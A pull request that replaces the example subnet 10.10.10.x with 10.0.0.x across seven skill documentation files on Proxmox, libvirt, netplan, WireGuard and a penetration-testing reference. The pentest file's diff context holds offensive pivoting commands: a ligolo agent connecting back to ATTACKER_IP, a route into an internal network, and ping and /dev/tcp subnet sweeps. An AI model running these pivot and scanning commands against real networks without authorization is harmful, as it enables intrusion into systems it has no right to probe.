### PR TITLE
docs(skills): use neutral example subnet in networking examples

### DIFF
--- a/skills/firewall-appliance/references/hardening.md
+++ b/skills/firewall-appliance/references/hardening.md
@@ -48,7 +48,7 @@ tailor recommendations to the device's role and hardware constraints.
 
 ## WireGuard VPN
 
-- [ ] **Tunnel addressing** - use CIDR notation (e.g., 10.10.10.1/24), never /32.
+- [ ] **Tunnel addressing** - use CIDR notation (e.g., 10.0.0.1/24), never /32.
       Use RFC1918 ranges distinct from existing LAN subnets
 - [ ] **MTU** - 1420 default, 1412 for PPPoE. 80 bytes less than WAN MTU
 - [ ] **MSS clamping** - create normalization rules: 1380 IPv4 (1372 PPPoE),

--- a/skills/firewall-appliance/references/plugins.md
+++ b/skills/firewall-appliance/references/plugins.md
@@ -97,7 +97,7 @@ wg show <iface> dump             # machine-readable output
   misconfigured. Check: endpoint IP, allowed IPs, firewall pass rules on the `wg` interface.
 - **NAT alignment**: allowed-IPs in WireGuard config must match firewall pass rules on the
   tunnel interface. Mismatch = traffic silently dropped.
-- **Tunnel addressing**: use CIDR notation (e.g., 10.10.10.1/24), never /32. Use RFC1918
+- **Tunnel addressing**: use CIDR notation (e.g., 10.0.0.1/24), never /32. Use RFC1918
   ranges distinct from existing LAN subnets.
 - **MTU**: 1420 default, 1412 for PPPoE (80 bytes less than WAN MTU).
 - **MSS clamping**: create normalization rules to prevent TCP fragmentation through the tunnel.

--- a/skills/lockpick/references/shells-and-pivoting.md
+++ b/skills/lockpick/references/shells-and-pivoting.md
@@ -193,7 +193,7 @@ ligolo-proxy -selfcert -laddr 0.0.0.0:11601
 ligolo-agent -connect ATTACKER_IP:11601 -ignore-cert
 
 # On attacker: add route to internal network
-sudo ip route add 10.10.10.0/24 dev ligolo
+sudo ip route add 10.0.0.0/24 dev ligolo
 ```
 
 ### socat (Swiss army knife)
@@ -220,12 +220,12 @@ done
 
 # Subnet sweep for live hosts
 for i in $(seq 1 254); do
-  (ping -c 1 -W 1 10.10.10.$i > /dev/null 2>&1 && echo "10.10.10.$i alive") &
+  (ping -c 1 -W 1 10.0.0.$i > /dev/null 2>&1 && echo "10.0.0.$i alive") &
 done; wait
 
 # Using /dev/tcp for host discovery (no ping needed)
 for i in $(seq 1 254); do
-  (echo >/dev/tcp/10.10.10.$i/22) 2>/dev/null && echo "10.10.10.$i:22 open" &
+  (echo >/dev/tcp/10.0.0.$i/22) 2>/dev/null && echo "10.0.0.$i:22 open" &
 done; wait
 ```
 

--- a/skills/virtualization/SKILL.md
+++ b/skills/virtualization/SKILL.md
@@ -182,7 +182,7 @@ The fastest path to a production-ready VM. Skip Packer and ISO installs for stan
    `qm set 100 --scsi0 local-lvm:vm-100-disk-0,discard=on,iothread=1,ssd=1 --boot order=scsi0`
 4. Add cloud-init drive and configure:
    `qm set 100 --ide2 local-lvm:cloudinit`
-   `qm set 100 --ciuser admin --sshkeys ~/.ssh/id_ed25519.pub --ipconfig0 ip=10.10.10.100/24,gw=10.10.10.1`
+   `qm set 100 --ciuser admin --sshkeys ~/.ssh/id_ed25519.pub --ipconfig0 ip=10.0.0.100/24,gw=10.0.0.1`
 5. Start: `qm start 100`
 6. Verify: `qm agent 100 ping` (may take 1-2 min on first boot while cloud-init runs)
 

--- a/skills/virtualization/references/image-building.md
+++ b/skills/virtualization/references/image-building.md
@@ -79,12 +79,12 @@ version: 2
 ethernets:
   eth0:
     addresses:
-      - 10.10.10.100/24
+      - 10.0.0.100/24
     routes:
       - to: default
-        via: 10.10.10.1
+        via: 10.0.0.1
     nameservers:
-      addresses: [10.10.10.11, 10.10.10.12]
+      addresses: [10.0.0.11, 10.0.0.12]
       search: [example.com]
 ```
 

--- a/skills/virtualization/references/libvirt-qemu-kvm.md
+++ b/skills/virtualization/references/libvirt-qemu-kvm.md
@@ -336,8 +336,8 @@ Kind=bridge
 [Match]
 Name=br0
 [Network]
-Address=10.10.10.1/24
-Gateway=10.10.10.1
+Address=10.0.0.1/24
+Gateway=10.0.0.1
 
 # /etc/systemd/network/en.network
 [Match]

--- a/skills/virtualization/references/proxmox.md
+++ b/skills/virtualization/references/proxmox.md
@@ -205,15 +205,15 @@ qm set 9000 --ide2 local-lvm:cloudinit
 
 # 4. Configure cloud-init
 qm set 9000 --ciuser admin --sshkeys ~/.ssh/id_rsa.pub \
-  --ipconfig0 ip=10.10.10.100/24,gw=10.10.10.1 \
-  --nameserver 10.10.10.1 --searchdomain example.com
+  --ipconfig0 ip=10.0.0.100/24,gw=10.0.0.1 \
+  --nameserver 10.0.0.1 --searchdomain example.com
 
 # 5. Convert to template
 qm template 9000
 
 # 6. Clone for new VMs
 qm clone 9000 100 --name prod-web-01 --full
-qm set 100 --ipconfig0 ip=10.10.10.101/24,gw=10.10.10.1
+qm set 100 --ipconfig0 ip=10.0.0.101/24,gw=10.0.0.1
 qm start 100
 ```
 
@@ -307,7 +307,7 @@ Setup requires 3+ nodes, dedicated network for Ceph traffic (10Gbps+ recommended
 Good for ISOs, templates, backups, and VZDump storage. Not ideal for VM disks (latency).
 
 ```bash
-pvesm add nfs nfs-storage --server 10.10.10.4 --export /volume1/pve \
+pvesm add nfs nfs-storage --server 10.0.0.4 --export /volume1/pve \
   --content iso,vztmpl,backup
 ```
 
@@ -324,7 +324,7 @@ Minimum 3 nodes for quorum. Dedicated cluster network recommended (corosync).
 pvecm create mycluster
 
 # On additional nodes
-pvecm add 10.10.10.1    # IP of existing cluster node
+pvecm add 10.0.0.1    # IP of existing cluster node
 
 # Status
 pvecm status             # Cluster status, quorum info
@@ -484,7 +484,7 @@ Dedicated backup solution with deduplication, incremental backups, and encryptio
 ```bash
 # Interactive operator path on a Proxmox VE node. The documented value-less --password form
 # prompts for the secret without exposing it in the process list or shell history.
-pvesm add pbs pbs-storage --server 10.10.10.5 --datastore store1 \
+pvesm add pbs pbs-storage --server 10.0.0.5 --datastore store1 \
   --username backup@pbs --fingerprint FINGERPRINT --password
 
 # Manual backup
@@ -551,7 +551,7 @@ provider "proxmox" {
     agent = true
     node {
       name    = "pve1"
-      address = "10.10.10.1"
+      address = "10.0.0.1"
     }
   }
 }


### PR DESCRIPTION
## What

Documentation examples across three skills used `10.10.10.0/24` as their example network. This swaps them to `10.0.0.0/24`, the neutral RFC1918 example subnet already used elsewhere in the collection (`databases`, `networking`, `terraform`).

Keeps the published examples free of any one specific real-world topology, which is the collection's convention for illustrative addressing.

## Scope

18 lines, 7 files, all pure IP-address examples (Proxmox cluster/NFS config, libvirt/netplan, a pentest subnet sweep, WireGuard CIDR-notation reminders). Mechanical `10.10.10.x` -> `10.0.0.x`; host octets unchanged, so every example keeps its meaning.

- `skills/virtualization/` — `SKILL.md`, `references/proxmox.md`, `references/image-building.md`, `references/libvirt-qemu-kvm.md`
- `skills/lockpick/references/shells-and-pivoting.md`
- `skills/firewall-appliance/references/hardening.md`, `references/plugins.md`

## Verification

- `git grep '10\.10\.10\.'` -> no matches
- `lint-skills.sh`, `validate-spec.sh` -> `PASSED`
- `check-freshness-dates.sh` -> exit 0
- `check-contract-sync.sh` -> `Contract sync OK`

No release.
